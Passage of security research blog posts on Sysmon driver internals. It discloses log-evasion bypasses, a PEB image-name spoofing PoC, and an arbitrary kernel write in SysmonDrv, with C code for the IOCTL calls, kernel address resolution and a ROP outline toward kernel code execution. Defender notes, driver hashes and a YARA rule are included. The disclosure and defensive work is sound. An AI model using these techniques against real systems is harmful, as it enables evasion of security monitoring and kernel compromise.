When CheckAndQueueFileDeleteEvent returns to indicate that the file delete event should be logged, the ArchiveFile function will perform a second round of checks that must be passed if the target file should be archived. Using the subroutine that I have called GetFileInfo, Sysmon queries the state of the file for information such as the file's hash, the first byte, if the file is the same repeated byte (shredded), and if "kernel crypto" is supported - it should always be. In addition to this, ArchiveFile also queries for the available disk space. The target file will not be archived if any of the following is true:

The file is shredded,
"Kernel crypto" is not supported,
The remaining disk space is less than 10 MB.
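Expressed as a predicate, the three veto conditions look like this. It is a sketch of the logic as described, with invented names, and it assumes "10 MB" means 10 * 1024 * 1024 bytes.

```python
MIN_FREE_BYTES = 10 * 1024 * 1024  # assumption: 10 MB interpreted as 10 MiB


def should_archive(is_shredded: bool, kernel_crypto_supported: bool,
                   free_disk_bytes: int) -> bool:
    """Return True only when none of the three veto conditions applies."""
    if is_shredded:
        return False
    if not kernel_crypto_supported:
        return False
    if free_disk_bytes < MIN_FREE_BYTES:
        return False
    return True


print(should_archive(False, True, 50 * 1024 * 1024))
```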

If archiving is appropriate, it will call one of two functions. If the current IRP is IRP_MJ_WRITE, it will call the function I named CopyFile; otherwise, it will call the one I named RenameFile. The reason for this is unknown to me. Both take the archive file name generated by ArchiveFile, which is the file's hash (from GetFileInfo) followed by its extension (from CheckAndQueueFileDeleteEvent).

CopyFile

This function is pretty self-explanatory and simple. The size of the file is queried and a buffer is created with a maximum size of 0x10000. The new archived file is created with FltCreateFile and chunks of the target file are copied over using FltReadFile and FltWriteFile. If, for some reason, the copy fails, Sysmon will report the error. The file delete event will be generated using QueueFileDeleteEvent, specifying a NULL value for the tenth IsArchived parameter.

RenameFile

ArchiveFile queues this function as a delayed work item and then immediately calls KeWaitForSingleObject to wait on it. Unfortunately, I do not have an explanation for this behaviour. Sysmon will simply rename the file from its original name to the archived file name (replacing any existing file) before reporting the file delete event using QueueFileDeleteEvent, specifying a NULL value for the tenth IsArchived parameter.

Bugs and Bypasses

Throughout my research of Sysmon - and to my surprise - I uncovered a few bugs and bypasses. In this section, I'll detail the findings and example implementations of how they can be abused. A special thank you to Samir for verifying these bugs as well as providing constant motivation.

File Shredding Bypass

Now that we understand how Sysmon identifies shredding and that it can archive files on such events, we can easily bypass it. Since shredding is defined by repeated bytes that fill the size of the file or greater, the solution is trivial: overwrite the data with alternating or random non-repeated bytes. Even overwriting everything with the same repeated byte except the final one - which obviously cannot be the same byte as the rest of the overwrite - will suffice.

Given the abundance of permutations for overwriting data, it's safe to assume that it's virtually impossible for Sysmon to detect these alternate methods. While it may be useful, I question its practicality.

File Delete and Overwrite Bypass

Sysmon has a small issue that seems to originate in the update from version 11.0 to 11.10 with the introduction of the CheckAndQueueFileDeleteEvent conditional in the specific FLAG_FILE_DELETE_ON_CLOSE case. The result of the IoQueryFileDosDeviceName call in CheckAndQueueFileDeleteEvent is placed in the file delete event reported to Sysmon64.exe, where it is checked against the filter. However, dynamic analysis reveals that the resulting file object name is always C:. This means that the filter match will always fail unless the target file name is something like

C:

For some unknown reason, the following rule does not seem to capture the file delete event with FLAG_FILE_DELETE_ON_CLOSE:

C:

In addition to file deletes, this also works in the case of file overwrites with the FLAG_FILE_DELETE_ON_CLOSE option. Since Sysmon gives precedence to this flag, targeting already existing files will never reach the code that is supposed to perform the file overwrite check. The result is that overwritten files are never archived or logged.

To demonstrate this, del on the command prompt deletes a file using the FLAG_FILE_DELETE_ON_CLOSE option. In the following image, the file creation is logged; however, the file delete event isn't.

Sysmon failing to log FLAG_FILE_DELETE_ON_CLOSE file deletes

Arbitrary Kernel Write

I mentioned earlier that the Sysmon driver returns data to its service process to determine if a file delete event should be logged. The service process communicates a boolean value back to the driver, which is written to a stack address. However, both the boolean value and the target stack address are controlled by the service process, which effectively means that there is a write-what-where primitive from user mode.

Service Process Registration

To abuse this, we need to take over Sysmon64.exe and register our own from the perspective of the driver. To connect to a driver, usually a call to CreateFile is made with the path specifying the symbolic link to its device object. In this case, Sysmon's driver's device name is \\.\SysmonDrv.

HANDLE Device = CreateFile(
	L"\\\\.\\SysmonDrv",
	GENERIC_WRITE | GENERIC_READ,
	0,
	NULL,
	OPEN_EXISTING,
	FILE_ATTRIBUTE_NORMAL,
	NULL
);

CreateFile to open a handle to the Sysmon device

This results in the IRP_MJ_CREATE request being sent to the driver, which is handled in the dispatch routine registered for IRP_MJ_CREATE. On examination, this code performs a privilege check on the requesting process with PRIVILEGE_SET_ALL_NECESSARY, which effectively means we require debug privileges.

Opening handle to Sysmon's device requires debug privileges

Once a handle to the device is opened, the next step is to register the process with Sysmon. This means that Sysmon must set its global service process to that of our process. Sysmon supports the 0x83400000 I/O control code that's handled by the driver dispatch under the IRP_MJ_DEVICE_CONTROL request which can be made via the DeviceIoControl function using the handle to the device. If we follow this control code in the function I labelled DriverDispatchDeviceControl, there is a length check for the input and output buffers.

Input and output buffer length checks

The input buffer size can be either 0 or 4 but the output buffer size must be 4. If the input buffer exists, it is checked against the value 1111 (0x457). This seems to be the version of Sysmon: here it is v11.11, and in Sysmon v12.0 it is 1200. If the input value is incorrect, the request returns STATUS_REVISION_MISMATCH and the registration fails. If the input buffer is not supplied, the revision check is skipped, so providing the input buffer is optional. The output buffer will always return the version.

DeviceIoControl(
	Device,
	0x83400000,
	NULL,	// Optionally a DWORD buffer = 1111.
	0,
	&OutputBuffer,
	sizeof(OutputBuffer),
	&BytesReturned,
	NULL
);

DeviceIoControl to register as a service process
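
The checks described above can be modelled in plain C. This is only a sketch of the logic as I've described it, not the driver's code: check_register_request and SYSMON_REVISION are hypothetical names, and the status returned for a bad buffer length is an assumption since only STATUS_REVISION_MISMATCH was identified.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define STATUS_SUCCESS            0x00000000u
#define STATUS_INVALID_PARAMETER  0xC000000Du /* Assumed status for bad lengths. */
#define STATUS_REVISION_MISMATCH  0xC0000059u
#define SYSMON_REVISION           1111u       /* v11.11; 1200 for v12.0. */

/* Hypothetical model of the validation done for the registration request. */
uint32_t check_register_request(const void *in, size_t in_len,
                                void *out, size_t out_len)
{
    uint32_t revision = SYSMON_REVISION;

    /* Input is optional (0 bytes) or one 4-byte value; output must be 4 bytes. */
    if ((in_len != 0 && in_len != 4) || out_len != 4 || out == NULL)
        return STATUS_INVALID_PARAMETER;
    if (in_len == 4 && in == NULL)
        return STATUS_INVALID_PARAMETER;

    /* Per the description, the output always receives the version. */
    memcpy(out, &revision, sizeof(revision));

    /* The revision is only compared when the caller supplied one. */
    if (in_len == 4) {
        uint32_t supplied;
        memcpy(&supplied, in, sizeof(supplied));
        if (supplied != SYSMON_REVISION)
            return STATUS_REVISION_MISMATCH;
    }

    return STATUS_SUCCESS;
}
```

Calling it with no input buffer succeeds and fills the output with 1111, while supplying 1200 as the input fails with STATUS_REVISION_MISMATCH.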

Once this requirement has been fulfilled, the driver will register the requesting process as the service process in its g_ServiceProcessHandle variable.

Sysmon driver registering a service process

The driver does not contain any other mechanisms like certificate checks to verify the service process so any executable is compatible.

Reading Events

To abuse the write, we need to be able to read the file delete events reported by the driver to obtain valid Event and ServiceProcessHandle values. As aforementioned, the driver supports another I/O control code, 0x83400004, which reads events from the g_EventReportList queue. The only requirement here is that the output buffer needs to be able to fit the size of the event. To be able to support all of the events, we can either dynamically resize the buffer with the returned size or we can simply allocate a buffer with the maximum event size (40000 from the QueueEvent function).

EventData = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 40000);
//
// Read events.
//
DeviceIoControl(
	Device,
	0x83400004,
	NULL,
	0,
	EventData,
	40000,
	&BytesReturned,
	NULL
);

Allocation and reading events from the Sysmon driver

We can use DeviceIoControl again with the handle to the Sysmon device. The output buffer will return the details of all queued events so we will have to differentiate them by their ID - this is the first member of the event structure. We are only interested in file delete events so we need to filter for 0xF0000000. The last check is if the event data contains a valid Event member (as checked by Sysmon64.exe so we will follow its convention).

Once all of the conditions have been fulfilled, we can finally send a request back to the driver to perform the write using the 0x83400010 I/O control code. The IsArchivedAddress member points to where the single IsArchived byte will be written. The Event and ServiceProcessHandle members will just be copied from the delete event that was read earlier.

if (((PEVENT_HEADER)EventData)->Id == 0xF0000000) {
	FileDeleteEvent = (PFILE_DELETE_EVENT)EventData;
	//
	// Check if Event is valid.
	//
	if (FileDeleteEvent->Event) {
		ZeroMemory(&ArchivedInfo, sizeof(SET_ARCHIVED_INFO));

		//
		// Initialise struct to write to kernel.
		//
		ArchivedInfo.Event = FileDeleteEvent->Event;
		//
		// Should be this process.
		//
		ArchivedInfo.ProcessHandle = FileDeleteEvent->ServiceProcessHandle;
		//
		// Set target address to write byte.
		//
		ArchivedInfo.IsArchivedAddress = (PBYTE)(0xDEADBEEFDEADBEEF);
		//
		// Set byte to write.
		//
		ArchivedInfo.IsArchived = 0x42;

		//
		// Send to driver.
		//
		DeviceIoControl(
			Device,
			0x83400010,
			&ArchivedInfo,
			sizeof(SET_ARCHIVED_INFO),
			NULL,
			0,
			&BytesReturned,	// Must not be NULL when lpOverlapped is NULL.
			NULL
		);
	}
}

Requesting SysmonDrv.sys to write a single byte to an arbitrary kernel address
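
For readers unfamiliar with how these numbers are built, the three control codes used so far can be split into their fields following the standard CTL_CODE layout. This is a small portable sketch; decode_ioctl and ioctl_fields are illustrative names of my own and not something from Sysmon.

```c
#include <stdint.h>

/* Fields of a Windows I/O control code, following the CTL_CODE layout. */
typedef struct {
    uint32_t device_type; /* Bits 16-31. */
    uint32_t access;      /* Bits 14-15 (0 = FILE_ANY_ACCESS). */
    uint32_t function;    /* Bits 2-13. */
    uint32_t method;      /* Bits 0-1 (0 = METHOD_BUFFERED). */
} ioctl_fields;

/* Split a control code into its four fields. */
ioctl_fields decode_ioctl(uint32_t code)
{
    ioctl_fields f;

    f.device_type = code >> 16;
    f.access      = (code >> 14) & 0x3u;
    f.function    = (code >> 2) & 0xFFFu;
    f.method      = code & 0x3u;

    return f;
}
```

Under this layout, 0x83400000, 0x83400004, and 0x83400010 all share device type 0x8340 with buffered I/O and no access restrictions, and differ only in their function numbers: 0, 1, and 4 respectively.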

It should be noted that there may be some queued events that contain a ServiceProcessHandle from Sysmon64.exe so it may take a few event reads to remove those from the queue before newer events start to contain our process's.

The result of the above example code is a bug check for writing to an invalid address.

BSOD from SysmonDrv.sys on kernel write at an arbitrary address

Arbitrary Kernel Write to Kernel Code Execution

To be able to execute code through Sysmon requires a few stars to align, some luck, and some hacks. We'll go over what we can do with an arbitrary kernel write, what issues we have to solve, what is available to us from Sysmon, and finally, how to combine everything together to create a solution that allows us to inject and execute code.

What We Have

Arbitrary kernel writes allow us to write a ROP chain into the stack, bypassing any stack cookie mitigations that might be present. This effectively allows us to gain control over the execution of code. But since the kernel is a volatile space with regards to unhandled exceptions, if we overwrite too much of a target stack, we may destroy critical data and crash the system. To be able to restore normal code execution, the solution I have come up with is to perform a stack pivot to another writable section in the kernel and write the ROP chain there.

Now that there is execution control, where can the stack pivot and the other gadgets be written reliably and safely to guarantee that they are all there before execution? We can guarantee the gadgets if they are written somewhere that isn't touched such as a data section cave. For the stack pivot, we don't want to have the target function finish before it's written.

Since we want to inject and execute code, we can first start off with allocating a pool that has RWX permissions for writing and then executing the code. Windows allows allocation of a NonPagedPool (we want the page to always be available for code execution) through the ExAllocatePoolWithTag function which contains the permissions we need. This also benefits us by reducing the complexity of needing to reprotect the code section. This is relatively easy to achieve and the ROP chain would look something like so:

pop rcx; ret
NonPagedPool
pop rdx; ret
Code size
pop r8; ret
Tag
ExAllocatePoolWithTag

ROP chain to allocate RWX pool

Injecting code into the pool is trivial but this is useless if we can't read the address of the pool. And how do we get the address of ExAllocatePoolWithTag? If we can somehow read the pool address and inject code, how can we execute the code?

Problem Solving

We have the basic requirements for getting code execution but some issues stand in the way. To summarise:

How do we reliably and safely write the stack pivot to control execution?
How do we get the address of ExAllocatePoolWithTag?
Once we allocate the pool, how do we read it back in usermode?
After the code is written into the pool, how can we execute it?

Starting with the first problem, we can abuse the thread blocking done in the QueueFileDeleteEvent function, which waits for the reply from the service returning the boolean value that determines whether a target file should be archived. This provides both reliability and safety when writing the stack pivot gadget. But we can only write a single byte before the event is signalled, continuing execution of QueueFileDeleteEvent. This means we cannot write the eight bytes needed to pivot the stack. To verify this assumption, I had a look into the KeSetEvent function that is called after the single byte write.

Early return from KeSetEvent

Looking at the disassembly, there is actually an early return that doesn't seem to do anything that would affect the state of the kernel as there are only reads and comparisons. So we have hope of writing more bytes before unblocking QueueFileDeleteEvent. If we set the pointer of the Event member to an address that contains the byte array 00 00 00 00 01 00 00 00, the first two checks will turn towards the early return. Since KeSetEvent is always called with a FALSE third argument, dil will always be 0.
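
The conditions for the early return can be modelled as follows. This is a sketch under my own assumption that the eight bytes map onto the start of a dispatcher header, with the first byte being the object type (0 for a notification event) and the 32-bit value at offset 4 being the signal state. The disassembly above is the authority here, and takes_early_return is a hypothetical name.

```c
#include <stdbool.h>
#include <stdint.h>

/*
 * Model of the early-return conditions: the object looks like an already
 * signalled notification event and the caller passed Wait = FALSE.
 */
bool takes_early_return(const uint8_t header[8], bool wait)
{
    /* Assemble the little-endian 32-bit value stored at offset 4. */
    uint32_t signal_state = (uint32_t)header[4]
                          | ((uint32_t)header[5] << 8)
                          | ((uint32_t)header[6] << 16)
                          | ((uint32_t)header[7] << 24);

    return header[0] == 0 && signal_state == 1 && !wait;
}
```

With the byte array 00 00 00 00 01 00 00 00 and a FALSE third argument, all of the conditions hold and nothing else in the function is reached.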

This can be further abused to write multiple bytes in quick succession because we don't need to wait for more delete events to provide valid Event addresses. The first delete event's Event value can be stored until the stack pivot and other gadgets have been written. The saved Event can be passed to unblock QueueFileDeleteEvent and execute the ROP on demand.

We now have the requirements to bypass the thread unblocking to write more than a single byte. But how do we find these values in ntoskrnl.exe with ASLR?

To solve the problem of ASLR and finding the address of ExAllocatePoolWithTag, Windows provides the EnumDeviceDrivers function which returns an array of the current base addresses of all drivers loaded into the kernel. The following code snippet demonstrates how this can be done.

PVOID
GetDriverBase(
	_In_ PCWSTR DriverName
)
{
	ULONG ReturnLength = 0;
	PVOID Drivers[1024];
	WCHAR DriverNames[MAX_PATH];

	ZeroMemory(Drivers, sizeof(Drivers));

	if (!EnumDeviceDrivers(Drivers, sizeof(Drivers), &ReturnLength)) {
		PRINT_ERROR("EnumDeviceDrivers failed: %u\n", GetLastError());
		return NULL;
	}

	for (SIZE_T i = 0; i < ReturnLength / sizeof(Drivers[0]); i++) {
		ZeroMemory(DriverNames, sizeof(DriverNames));

		if (GetDeviceDriverBaseName(Drivers[i], DriverNames, ARRAYSIZE(DriverNames))) {
			if (StrStrI(DriverNames, DriverName)) {
				return Drivers[i];
			}
		}
	}

	return NULL;
}

Example code to get the kernel base address of a driver

To get the offsets within a driver, LoadLibrary can be used to load it into the usermode process. Subtracting the base of the user-loaded module from the address of the target function gives its offset, and adding the kernel base address from EnumDeviceDrivers to that offset gives the correct kernel address.

PVOID
GetNtProc(
	_In_ PCSTR ProcName
)
{
	PVOID Proc = NULL;
	HMODULE NtBaseLib = NULL;
	PVOID ProcAddress = NULL;

	NtBaseLib = LoadLibrary(L"ntoskrnl.exe");
	if (!NtBaseLib) {
		return NULL;
	}

	Proc = GetProcAddress(NtBaseLib, ProcName);
	if (!Proc) {
		FreeLibrary(NtBaseLib);
		return NULL;
	}

	ProcAddress = (PVOID)((ULONG_PTR)GetDriverBase(L"ntoskrnl.exe") + (ULONG_PTR)Proc - (ULONG_PTR)NtBaseLib);

	FreeLibrary(NtBaseLib);

	return ProcAddress;
}

Example code to get the kernel address of a function in ntoskrnl.exe
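
The arithmetic in GetNtProc is easier to see in isolation. Here is a minimal portable sketch of it, where rebase_to_kernel is an illustrative name and the addresses in the note below are made up.

```c
#include <stdint.h>

/*
 * Translate an address inside the user-mode mapping of a module into the
 * matching address inside the kernel-loaded copy of the same module.
 */
uint64_t rebase_to_kernel(uint64_t user_base, uint64_t user_addr,
                          uint64_t kernel_base)
{
    /* Offset of the symbol from the start of the image. */
    uint64_t offset = user_addr - user_base;

    return kernel_base + offset;
}
```

For example, a function found at 0x7FF600123450 in a module mapped at 0x7FF600000000 has an offset of 0x123450, so with a kernel base of 0xFFFFF80012340000 it lives at 0xFFFFF80012463450.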

The next problem is reading the allocated pool. Sysmon provides only one way of providing controllable data back to usermode and that is through event reporting. We can abuse this by writing the pool address to an event and then reading it in the usermode process. The first thing I tried was to ROP into QueueEvent using a custom event passed into rcx. However, there were two issues. Calling QueueEvent will trigger a path that will call ExFreePool which will eventually cause a bug check with a stack issue. The reason for this is unknown to me but I could not get it to work. The alternative to this is to skip the beginning of the function and ROP into the code that queues the new event. Unfortunately, acquiring the mutex to manipulate g_EventReportList throws another bug check so this route won't work either.

To force this to work, a hack was needed. Since accessing g_EventReportList through QueueEvent was not feasible, the alternative is to access the event queue directly, which works but with some small issues: an event must already be queued and it must not be removed. Since a process does not need to be "registered" by the driver to read events, Sysmon64.exe can still pull them from g_EventReportList despite our own process already interacting with the driver. To combat this, we can simply suspend the threads of Sysmon64.exe. If an event is not queued and the write of the pool address is attempted, the system will bug check with a corrupted list error. This hack is therefore a potential point of failure.

Because we are writing to an existing event, we need to choose a member to overwrite. Sysmon events are usually formatted with a four-member header. Here's what the file delete event looks like as an example:

typedef struct _FILE_DELETE_EVENT {
	/*   0 */ ULONG Id;          // 0xF0000000 for file delete.
	/*   4 */ ULONG Size;        // Struct size.
	/*   8 */ PVOID Unk1;
	/*  10 */ PVOID Unk2;
	// Omitted for brevity
} FILE_DELETE_EVENT, *PFILE_DELETE_EVENT;

Event header members for Sysmon events

In all events that aren't the report event type, Unk1 and Unk2 are always 0. If we write the pool address into one of these members, we can easily determine whether the pool address was written simply by checking for a non-zero value. The usermode process can now read the allocated pool address through the event list.
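
On the usermode side, the check boils down to looking at the header of each event that is read back. A rough portable sketch follows, assuming the address was written into Unk1 (Unk2 would work the same way). The event_header type and extract_leaked_pointer are illustrative names and not part of my PoC.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Mirror of the four-member event header with fixed-width types. */
typedef struct {
    uint32_t id;   /* 0x00: event type. */
    uint32_t size; /* 0x04: size of the whole event. */
    uint64_t unk1; /* 0x08: normally 0. */
    uint64_t unk2; /* 0x10: normally 0. */
} event_header;

/* Returns true and stores the value if Unk1 was overwritten. */
bool extract_leaked_pointer(const void *event, size_t len, uint64_t *out)
{
    event_header header;

    if (event == NULL || out == NULL || len < sizeof(header))
        return false;

    /* Copy out of the raw buffer to avoid alignment assumptions. */
    memcpy(&header, event, sizeof(header));

    if (header.unk1 == 0)
        return false;

    *out = header.unk1;
    return true;
}
```

An untouched event returns false, so the read can simply be retried until a non-zero value shows up.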

Injecting code into the pool is trivial. The data can be written quickly using the KeSetEvent bypass. The final problem we need to solve is how the code is executed. The first few solutions involved spawning a thread using functions like PsCreateSystemThread, IoCreateSystemThread, IoQueueWorkItem, ExQueueWorkItem, and IoCreateDriver. However, these all end up as bug checks, either caused directly by the function or as a side effect from calling ExFreePool. No matter, we have an arbitrary write so we can simply take advantage of Sysmon's use of dynamic function resolution to call our code. For example, Sysmon dynamically resolves ZwOpenProcessTokenEx and so we can just overwrite the value in the data section to point to our code's entry point. Luckily for us, Sysmon does not use Control Flow Guard.

SysmonDrv using dynamically resolved ZwOpenProcessTokenEx

Again, we need to handle the return safely so that restoration can be done to stop the kernel from panicking. We can simply return an erroneous NTSTATUS value or we can jump to ZwOpenProcessTokenEx from the shellcode after it finishes.

This concludes the issues that we had. We were able to combine a write-what-where primitive with a read provided by Sysmon, allowing us to inject arbitrary data into the kernel. From there, we took advantage of dynamic function resolution to execute our code. It should be noted that if stack pivoting is used, there is a chance that the kernel may bug check on an invalid stack pointer location. This chance increases each time the pool address fails to be read and more attempts are required.

Demonstration

As a proof-of-concept, I've developed some shellcode that disables LSASS PPL:

Notes for Defenders

This section was written by Samir with advice for defenders.

With the BYOV (Bring Your Own Vulnerability) option an attacker with the need to execute code or evade some kernel mode protection can leverage this technique and install a vulnerable Sysmon driver version. Thus it’s recommended to prevent the installation of those versions (as of writing this, versions before Sysmon v11.00 are not impacted).

Hashes of Impacted SysmonDrv versions:

35c67ac6cb0ade768ccf11999b9aaf016ab9ae92fb51865d73ec1f7907709dca
d2ed01cce3e7502b1dd8be35abf95e6e8613c5733ee66e749b972542495743b8
a86e063ac5214ebb7e691506a9f877d12b7958e071ecbae0f0723ae24e273a73
c0640d0d9260689b1c6c63a60799e0c8e272067dcf86847c882980913694543a
2a5e73343a38e7b70a04f1b46e9a2dde7ca85f38a4fb2e51e92f252dad7034d4
98660006f0e923030c5c5c8187ad2fe1500f59d32fa4d3286da50709271d0d7f
7e1d7cfe0bdf5f17def755ae668c780dedb027164788b4bb246613e716688840

Hashes for versions of SysmonDrv.sys

Although detection of this kind of technique is hard (using Sysmon itself or Windows native logging), below is a listing of some suspicious key events that occur before the exploitation completes.

Suspicious process attempting to access the Sysmon Service: note the PROCESS_SUSPEND_RESUME (0x0800) requested access (excludes generic access rights and alerts on sensitive ones).

Process Access event targeting Sysmon64.exe

Suspicious Process loading NT OS Kernel (should be rare and limited to the System virtual process):

Image Load event with ntoskrnl.exe

YARA Signature

rule Sysmon_KExec_KPPL {
meta:
 date = "30-09-2020"
 author = "SBousseaden"
 description = "hunt for possible injection with Instrumentation Callback PE"
 reference = "https://undev.ninja/p/9af8ac08-4879-4d87-a92b-ff4abc778908/"
strings:
 $sc1 = {90 51 B9 00 48 8D 0D DB 1F 00 00 44 89 7C 24 48 41 8B F7 4C 89 BD F0 01} 
 $sc2 = {65 C7 85 B8 01 00 00 48 8B 04 25} 
 $sc3 = {C7 85 BC 01 00 00 88 01 00 00 C7 85 C0 01 00}
 $sc4 = {DC 01 00 00 EA C6 80 ?? C7 85 E0 01 00 00 ?? 00 00 00 48}
 $sc5 = {C7 85 E4 01 00 00 48 B8 00 00 C7 85 EC 01 00 00 00 00 48 B9} 
 $sc6 = {48 89 01 59 66 C7 85 FC 01 00 00 FF E0}
 $sc7 = {65 48 8B 04 ?? ?? ?? 25 88 01 00}
 $sc8 = {48 8B 04 25 C7 85 4C 02 00 00 88 01}
 $sc9 = {48 89 01 59 66 C7}
 $ioc1 = {30 45 33 C9 C7 44 24 28 B8 FC 03 00 45 33 C0 BA 04 00 40 83 48 89 5C 24 20 48 8B}
 $ioc2 = {4C 89 74 24 30 BA 10 00 40 83 44 89 74 24 28 48 8B CE 4C 89}
 $sdrv1 = "SysmonDrv" wide
 $sdrv2 = "SysmonDrv"
condition: uint16(0) == 0x5a4d and 1 of ($sdrv*) and (2 of ($sc*) or 1 of ($ioc*))
}

Conclusion

This marks the end of the article. The file delete functionality was documented to the best of my ability and hopefully it is useful to someone. It would be great if someone more knowledgeable could explain some of the things I couldn't.

Along with the internals, I think the bonus kernel code execution in SysmonDrv is pretty hilarious and ironic, repurposing Microsoft's own product that was built as a defensive tool for offensive and malicious intent. Ultimately, it does require administrative privileges to be abused and so it isn't a critical issue from a purely technical perspective (administrator to kernel isn't a security boundary!). However, because it is a Microsoft product and it's used as a trusted, core defensive component that's widely deployed, I personally feel like the impact is much greater. Having an issue like this in a security product may damage the reputation of Microsoft in some eyes. But as the product begins to pick up more functionality and increase in complexity, it's inevitable that security issues will be introduced. Microsoft should perform more internal testing for potential security issues and other bugs in future releases.

Anyway, I hope that this can benefit and serve others more than it does me, and that the reliability and capability of it can be improved (apologies for my amateur skill in exploit development). As always, my code can be found on my GitHub: https://github.com/NtRaiseHardError/Sysmon

Sysmon Image File Name Evasion

NtRaiseHardError — Wed, 17 Jun 2020 13:48:41 GMT

One of my side projects for understanding the Windows kernel and driver development includes research into the Sysmon driver. After having read some weird methods of how other drivers access processes' image file names on Twitter and in Bill Demirkapi's How to use Trend Micro's Rootkit Remover to Install a Rootkit blog post, I decided I should investigate further into what Sysmon did too. And so, the result is this post which looks at how Sysmon does it and what it does is mind-boggling. As for the how, I hope someone else can provide that for me!

Software versions and testing environments:

SysmonDrv version 11.0
SysmonDrv version 10.42
Windows 10 x64 version 2004

Discovery

My research into the Sysmon driver begins at version 10.42 (just a little bit outdated). I was trying to look into how Sysmon handles process access events in the ObRegisterCallbacks' post operation routine. This eventually led me to the function - that I will name GetProcessInfo - which is called in the event that a process has been detected to access another process:

GetProcessInfo to query the source process' image name

The blue arrow points to a call to ZwQueryInformationProcess with the ProcessBasicInformation value to retrieve a PROCESS_BASIC_INFORMATION structure:

typedef struct _PROCESS_BASIC_INFORMATION {
    PVOID Reserved1;
    PPEB PebBaseAddress;
    PVOID Reserved2[2];
    ULONG_PTR UniqueProcessId;
    PVOID Reserved3;
} PROCESS_BASIC_INFORMATION;

PROCESS_BASIC_INFORMATION structure

At offset +8 (rbp-11h) in the ProcessInformation return value parameter (rbp-19h) lies the PebBaseAddress member which points to the Process Environment Block (PEB). This is passed into the GetProcessInfo function along with three other UNICODE_STRING values that indicate the source process' image file name, current directory, and command line. The last two strings are NULL so they do not return any value.
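
The offsets quoted above can be sanity-checked with a fixed-width mirror of the structure. This is only an illustrative sketch for x64: process_basic_information64 and peb_field_frame_offset are names I made up for it.

```c
#include <stddef.h>
#include <stdint.h>

/* x64 layout of PROCESS_BASIC_INFORMATION using fixed-width members. */
typedef struct {
    uint64_t reserved1;
    uint64_t peb_base_address;
    uint64_t reserved2[2];
    uint64_t unique_process_id;
    uint64_t reserved3;
} process_basic_information64;

/*
 * Given where the structure sits relative to rbp, return where its
 * PebBaseAddress member sits relative to rbp.
 */
long peb_field_frame_offset(long struct_frame_offset)
{
    return struct_frame_offset
         + (long)offsetof(process_basic_information64, peb_base_address);
}
```

With the structure at rbp-19h, the member at offset +8 lands at rbp-11h, which matches the operand seen in the disassembly.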

Inside the GetProcessInfo function, the driver attaches to the source process and reads the PEB:

Reading and copying the process' PEB structure

In the blue, the rbx register gets set to the PebBaseAddress value and then it is read from using ProbeForRead and what looks to be an optimised RtlCopyMemory. Next, it will read and copy the ProcessParameters member from the PEB structure:

Reading and copying the process' PEB's ProcessParameters member

After this, it calls an internal function that I've named GetProcessParameterString which takes both the recently read PEB and its ProcessParameters member. This specific call shown here also retrieves the ProcessParameters' ImagePathName member:

Retrieves ImagePathName from the PEB's ProcessParameters.

Within GetProcessParameterString, it performs the same ProbeForRead functionality as before:

GetProcessParameterString reads and copies ProcessParameters members

Returning back to the function that called GetProcessInfo, we can see that the CurrentProcessImageFileName variable is copied into the event data structure to be logged:

Copying source image process name into event structure for logging

POC

The PoC is as simple as:

PPEB Peb = (PPEB)__readgsqword(0x60);
PRTL_USER_PROCESS_PARAMETERS ProcessParameters = Peb->ProcessParameters;
UNICODE_STRING FakeImagePathName = { 
    0x8, 0x8,
    L"Test"
};
    
ProcessParameters->ImagePathName = FakeImagePathName;

That's literally it.
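
One detail worth spelling out is that the two 0x8 values in the PoC are lengths in bytes, not characters, since each character of "Test" is two bytes wide. A portable sketch of that calculation, using stand-in types of my own (unicode_string and make_unicode_string are not Windows definitions):

```c
#include <stddef.h>
#include <stdint.h>

/* Stand-in for UNICODE_STRING with 16-bit characters. */
typedef struct {
    uint16_t length;         /* Bytes in use, excluding the terminator. */
    uint16_t maximum_length; /* Bytes available in the buffer. */
    const uint16_t *buffer;
} unicode_string;

/* Build a counted string from a NUL-terminated 16-bit string. */
unicode_string make_unicode_string(const uint16_t *text)
{
    unicode_string s;
    size_t chars = 0;

    while (text[chars] != 0)
        chars++;

    s.length = (uint16_t)(chars * sizeof(uint16_t));
    s.maximum_length = s.length; /* Mirrors the PoC's 0x8, 0x8. */
    s.buffer = text;

    return s;
}
```

Passing the four characters of "Test" yields a length of 8, so a longer fake path needs both values scaled accordingly.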

Affected Events

So now that I know this function exists and takes multiple parameters (some are NULL'd out in what I've shown), I thought that surely there must be more uses of it elsewhere. Lo and behold, there are:

Affected events using GetProcessInfo

IDA's proximity view comes in especially handy here, showing which functions lead to GetProcessInfo. File events, registry, and process access events are all affected, with varying degrees of impact on the event data which we shall see soon. Although the thread notification callback routine uses this function, I've not highlighted it because the process cannot change its PEB data before it gains control (unless someone knows a way to do this too).

Luckily, there haven't been many changes between Sysmon 10.42 and 11.0 - I believe most of them were for the new file archiving functionality - so the issue persists.

Event ID 11 - FileCreate

FileCreate event with faked image

Event ID 23 - FileDelete

FileDelete event with faked image

While both of these file events can have false image values, the target file object's path cannot be modified.

Event ID 13 - RegistryEvent (Set Value)

Registry set value event with faked image

Event ID 12 - RegistryEvent (Add or Delete)

Registry add or delete event with fake image

Similar to the file events, the target registry object cannot be changed.

ProcessAccess

The ProcessAccess event has an additional CallTrace element that tracks the call stack. If we try the same PEB trick, we get the following:

ProcessAccess event with faked source image

Here, the CallTrace values reveal the true source image path. These values are obtained with the RtlWalkFrameChain function. The reason why I have included \Downloads\ in the string is so that Sysmon will trigger the event for demonstration purposes.

To get the image names, Sysmon enumerates the linked list of modules within the PEB for each address within the call stack. It will read the PEB's PEB_LDR_DATA structure first:

Read PEB's PEB_LDR_DATA structure

Then it will call the function - I named it GetBackTraceModuleInfo - passing in the PEB_LDR_DATA, InMemoryOrderModuleList list, the address to query (BackTraceEntry), and ModuleInfo:

Calling GetBackTraceModuleInfo

The proprietary ModuleInfo structure contains the following information:

typedef struct _MODULE_INFO {
    /*   0 */ WCHAR FullDllName[260];   // Module name.
    /* 208 */ PVOID Reserved;
    /* 210 */ PVOID DllBase;
    /* 218 */ ULONG SizeOfImage;
    /* 21C */ BOOLEAN IsWow64;
    /* 220 */ PVOID BackTraceAddress;
} MODULE_INFO, * PMODULE_INFO;

This function performs the module list enumeration to locate the module which contains the BackTraceEntry address. It is tested against DllBase and DllBase + SizeOfImage obtained from the LDR_DATA_TABLE_ENTRY structure:

Checking BackTraceEntry's address

